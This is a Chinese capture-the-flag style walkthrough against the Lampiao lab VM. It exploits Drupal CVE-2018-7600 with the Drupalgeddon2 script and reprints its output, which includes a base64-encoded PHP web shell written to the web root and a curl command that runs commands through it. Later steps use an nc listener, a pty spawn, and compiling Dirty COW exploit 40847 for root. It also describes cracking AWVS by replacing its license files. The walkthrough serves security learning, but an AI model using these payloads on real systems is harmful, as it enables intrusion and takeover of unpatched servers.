2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

news2024/10/6 22:26:26

特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。

文章目录

  • 前言
  • 一、环境重新部署
  • 二、AWVS+xray联动和xray+bs联动
    • 1.安装AWVS+xray
    • 2.让xray和bs先联动
    • 3.AWVS和xray联动
  • 三、poc利用
  • 四、msf的cve利用(姿势3)
  • 总结


前言

前言:

我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell

这次我们用框架来尝试两种不同方法拿到shell

思路清晰,先说步骤

1.信息收集得到可以用的站点漏洞

2.通过AWVS+xray或xray和bs解析出目录报告,得到我们能利用exp或poc,当然因为AWVS爬虫功能并不免费,所以最好联动,也可以和其他工具联动,思想是自动化的思想,得到可以利用的框架漏洞。

3.得到可以用的poc或exp直接利用提权,如果又cve更好。


一、环境重新部署

前面我们从robots.txt拿到的框架搜索一下

在这里插入图片描述drupal 7.54

谷歌老师
在这里插入图片描述
我们把靶机移到和我windows一样的网段,我用kali扫描他
靶机ip
192.168.198.135

在这里插入图片描述
在这里插入图片描述


二、AWVS+xray联动和xray+bs联动

1.安装AWVS+xray

在这里插入图片描述
点这个安装
在这里插入图片描述
无脑下一步就好了

复制wvsc.exe到“C:\Program Files (x86)\Acunetix\13.0.200205121\”下覆盖同名文件
(这里的路径是自己awvs选择的下载安装路径)

在这里插入图片描述
把认证文件替换了
复制license_info.json到“C:\ProgramData\Acunetix\shared\license”下覆盖同名文件
(这个的路径都一样)

在这里插入图片描述直接运行
在这里插入图片描述安装xray

解压、运行acunetix_13.0.200205121.exe安装
在这里插入图片描述在这里插入图片描述

2.让xray和bs先联动

先了解一下xray命令
如果想要进行单个网页简单的扫描

.\xray_windows_amd64.exe webscan --url http://192.168.198.135:1898/ --html-output single-url.html

在这里插入图片描述

因为如果我们想要单个界面逐个测试,同时验证漏洞是否可执行,那么就需要 BS作为中间人,把数据传到 Xray , 我们就可以根据 Xray 给的漏洞提示结合 BS 进行漏洞可行性测试

打开 BS , 设置代理,此操作是为了向 Xray 传输数据

在这里插入图片描述
接着我们向 Xray 设置监听,用来接收BS收到的数据

.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output test.html

在这里插入图片描述我们下载bs做中间人攻击代理,把包转发给xray
在这里插入图片描述我们发数据包过去
在这里插入图片描述
xray跑出来了很多信息
在这里插入图片描述

我们目前是网页—》bs—》xray
我们还需要和AWVS和xray联动

3.AWVS和xray联动

如果我想利用社区版 Xray 进行爬虫爆破子域名或者各种文件后缀,不好意思,这些功能得付费才能使用
但是我们又知道 AWVS 的爬虫功能又很厉害,那么我们能不能将二者结合起来呢?

打开 AWVS
默认进入网站是 127.0.0.1:3443 ,前提是你没有修改端口
添加一个target
在这里插入图片描述
点击save
在这里插入图片描述
为 AWVS 设置代理

上一步点击代理后,就会跳到另一个界面

划到底部就会看见 HTTP

点击 Proxy Server 就会展开
在这里插入图片描述
先点save,再点scan
在这里插入图片描述
如果没有特殊要求点击 Create Scan 即可
在这里插入图片描述联动了
在这里插入图片描述

三、poc利用

通过AWVS+xray跑出了

poc:poc-yaml-drupal-cve-2018-7600-rce

那么Xray是给出了两篇poc的文章:
https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/

用法:
在这里插入图片描述

wget clone https://github.com/dreadlocked/Drupalgeddon2.git
./drupalgeddon2.rb http://192.168.198.135:1898/

报错了
在这里插入图片描述要安装模块

sudo gem install highline

在这里插入图片描述通过poc发现对方是7.x的drupal版本漏洞,通过base64方法上传shell.php成功获得shell
在这里插入图片描述
上传一句话木马 连马

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.198.135:1898/
--------------------------------------------------------------------------------
[+] Found  : http://192.168.198.135:1898/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo IXTDUTSD
[+] Result : IXTDUTSD
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://192.168.198.135:1898/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://192.168.198.135:1898/shell.php' -d 'c=hostname'

然后该shell是无法执行g++命令的

我将python进行反弹shell到本地nc交互:

kali开启nc监听

nc -vlp 6666

在这里插入图片描述
靶机有python执行远控,主动连接

这里的python 的socket远控代码大家私信我,我直接发出来不太好。。。。

反弹shell
bash的shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
kali网页开启http
在这里插入图片描述
靶机wget

wget http://192.168.198.133:8000/40847.cpp

在这里插入图片描述
提权
在这里插入图片描述

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

在这里插入图片描述
flag
在这里插入图片描述

四、msf的cve利用(姿势3)

这个姿势我们用框架的cve渗透靶机
在这里插入图片描述查看要配置的参数

在这里插入图片描述run攻击playload
在这里插入图片描述
这里提权步骤有些问题

因为wget在这里用不了,我们可以用其他方式上传文件
在这里插入图片描述
这是一个伪shell
不会回显信息
我们要获取tty

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述尝试提权
在这里插入图片描述

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o muma 40847.cpp -lutil

在这里插入图片描述
提权不了,这里是因为主动连接的问题,还是需要让靶机主动连接我们

远控木马不能发,私信我,谅解一下

nc连接
在这里插入图片描述
提权

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

flag
在这里插入图片描述


总结

上面就是对于框架渗透的wp了,希望大家能学到这个方法论,喜欢的可以点个赞。
特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/492935.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Spring框架全系列】如何创建一个SpringBoot项目

&#x1f307;哈喽&#xff0c;大家好&#xff0c;我是小浪。前几篇博客我们已经介绍了什么是Spring&#xff0c;以及如何创建一个Spring项目&#xff0c;OK&#xff0c;那么单单掌握Spring是完全不够的&#xff0c;Spring的家族体系十分强大&#xff0c;我们还需要深入学习&am…

力扣---LeetCode160. 相交链表(代码详解+流程图)

文章目录 前言160. 相交链表链接&#xff1a;思路&#xff1a;方法一&#xff1a;暴力求解法1.1 时间复杂度&#xff1a;O(M*N)1.2 代码&#xff1a; 方法二&#xff1a;双指针2.1 时间复杂度&#xff1a;O(N)2.2 代码&#xff1a;2. 3流程图&#xff1a; 注意&#xff1a;补充…

13. Transformer(下)

P33 Transformer&#xff08;下&#xff09; 视频链接 P33 Transformer&#xff08;下&#xff09; 1. Decoder: Autoregressive(AT) Decoder原理&#xff1a; Encoder vs Decoder&#xff1a; Masked&#xff1a; how to stop&#xff1a; 2. Decoder: Non-autoregressive(…

网络基础——网络的发展史

作者简介&#xff1a;一名计算机萌新、前来进行学习VUE,让我们一起进步吧。 座右铭&#xff1a;低头赶路&#xff0c;敬事如仪 个人主页&#xff1a;我叫于豆豆吖的主页 目录 前言 一.网络发展史 1. ARPANET 2.TCP/IP协议 3. 互联网 4.Web浏览器 5.搜索引擎 6. 社交网…

如果你访问了某个网站,又不想让人知道怎么办?

问大家一个问题&#xff1a;如果你访问了某个网站&#xff0c;又不想让人知道怎么办&#xff1f; 你可能会说&#xff0c;把浏览器浏览历史记录清除&#xff0c;或者直接用无痕模式。 如果你只能想到这一层&#xff0c;那只能说图young&#xff01; 这么说吧&#xff0c;理论…

操作系统原理 —— 调度的概念、层次(十一)

调度的基本概念 在操作系统中的调度&#xff0c;是指操作系统从就序队列中选择一个作业&#xff0c;或者进程进行执行。 举个例子&#xff1a; 比如我们去银行窗口排队&#xff0c;排队的人就相当于就绪列表&#xff0c;窗口就相当于是操作系统&#xff0c;窗口需要服务排队…

npm的使用和命令

3.0 npm 什么是npm 是node管理包的工具 3.1 初始化包管理描述文件 package.json npm init // 会询问你每次的选项 或 npm init -y // 不询问你选项&#xff0c;默认就是确定 首先建立一个文件在路径里面全选写cmd 然后打开环境 在里面写npm init -y回车 就会在你原来空的文…

编写用户帮助/操作手册指南

背景&#xff1a; 用户操作手册是一份指导用户使用产品或服务的重要手册。 一个新系统&#xff0c;需要写用户操作手册&#xff0c;该从何下笔&#xff1f;本篇是一篇教你编写用户帮助/操作手册的指南&#xff5e; 首先&#xff0c;先来看一个反例 &#xff1a; 这个是我入职…

移动通信(17)预编码

源于某篇学位论文 利用预编码技术可以有效抑制大规模天线传输中的干扰&#xff0c;提高链路的峰值速率。大规模天线技术在提升性能的同时也存在很大的干扰问题。多天线传输中带来的多径干扰不可忽视。通常在接收端抑制干扰算法通常实现起来较为复杂&#xff0c;若采用预编码技…

安装Node.js和cnpm

一、安装Node.js 1.下载 Node.js官网下载 根据自身系统下载对应的安装包&#xff08;我这里为Windows10 64位&#xff0c;故选择下载第一个安装包&#xff09; 2、然后点击安装&#xff0c;选择自己要安装的路径&#xff0c;此处我选择的是&#xff1a;D:\Program Files\node…

中级软件设计师备考---UML

目录 面向对象的基础概念面向对象的设计原则UML的各类图设计模式对比分类 面向对象的基础概念 【只介绍一些我个人不太熟悉的概念】 继承和泛化&#xff1a;泛化和继承可以理解为是一个逆过程&#xff1a;泛化就是有子类抽象出一个父类&#xff0c;而继承就是由父类具体化一个…

程序员崩溃的N个瞬间

说到程序员&#xff0c;在外界眼里&#xff0c;他们是掌控代码的大神&#xff0c;他们是改变世界的王者。其实程序员的工作不容易&#xff0c;不信&#xff0c;就来看看程序员崩溃的各种瞬间—— 01、公司实习生找bug 02、在调试时&#xff0c;将断点设置在错误的位置 03、当我…

eventMesh 本地搭建记录

官方文档: Apache EventMesh (Incubating) | Apache EventMesh (作为整体了解 可以先看看架构) 按照官方文档需要搭建服务 eventmesh-store 文档推荐的是 rocketmq docker pull apache/rocketmq:4.9.4 部署rmq 的过程 1.nameServer docker run -d -p 9876:9876 -v pwd/d…

NECCS|全国大学生英语竞赛C类|词汇和语法|语法题|时态 非谓语动词 |19:00~20:15|完形填空·词性转化

14:35&#xff5e;14:45 15:45&#xff5e;16:2019:00&#xff5e;20:15 http://t.csdn.cn/XbsUy 目录 &#xff08;一&#xff09;时态 7. 将来进行时 8. 过去将来进行时 9. 现在完成时 10. 过去完成时​编辑 11. 将来完成时 12. 现在完成时 13. 过去完成进行时 &#xff08;…

David Silver Lecture 4: Model-Free Prediction

1 Introduction 任务&#xff1a;第三章使用动态规划方法&#xff0c;解决known的MDP问题&#xff0c;这章通过model free prediction对一个unknown的MDP估计他的value function。下一章通过Model free control的方法针对一个unknown的MDP optimise value function。 2 Monte…

密码学【java】初探究加密方式之消息摘要

文章目录 一 消息摘要1.1 消息摘要的特点1.2 消息摘要常见算法1.3 数字摘要的运用举例&#xff1a;1.4 字符串数字摘要演示1.5 其他数字摘要算法演示1.6 获取文件消息摘要 一 消息摘要 消息摘要&#xff08;Message Digest&#xff09;又称为数字摘要(Digital Digest)它是一个…

Feign组件的使用及开发中使用方式

在微服务的服务集群中服务与服务之间需要调用暴露的服务.那么就需要在服务内部发送http请求&#xff0c; 我们可以使用较为老的HttpClient实现&#xff0c;也可以使用SpringCloud提供的RestTemplate类调用对应的方法来发送对应的请求。 说明&#xff1a; 现在有两个微服务一个是…

java反序列化cc3链分析

前言 休息完五一&#xff0c;继续卷&#xff0c;原本想结束cc链的&#xff0c;但是发现cc3链好像用的方法不太一样&#xff0c;感觉也是可以记录下来&#xff0c;这里感觉cc3链有一些像cc1链的变种&#xff0c;就像是给你一些绕过的操作 在说一句&#xff0c;白日梦组长永远的神…

使用开源的zip.cpp和unzip.cpp实现压缩包的创建与解压

目录 1、使用场景 2、压缩包的创建 3、压缩包的解压 4、CloseZipZ和CloseZipU两接口的区别 5、开源zip.cpp和unzip.cpp文件的下载 VC常用功能开发汇总&#xff08;专栏文章列表&#xff0c;欢迎订阅&#xff0c;持续更新...&#xff09;https://blog.csdn.net/chenlycly/…

低代码平台组件间事件交互

事件的分类 我们主要依托于事件来进行组件间的交互。为了满足组件与组件、组件与系统、组件与服务端的交互&#xff0c;我们大致可以将事件分为三个类别&#xff1a; 组件方法&#xff1a;每个组件都会暴露出一些方法供其他组件进行调用。例如表格组件&#xff0c;我们可以暴…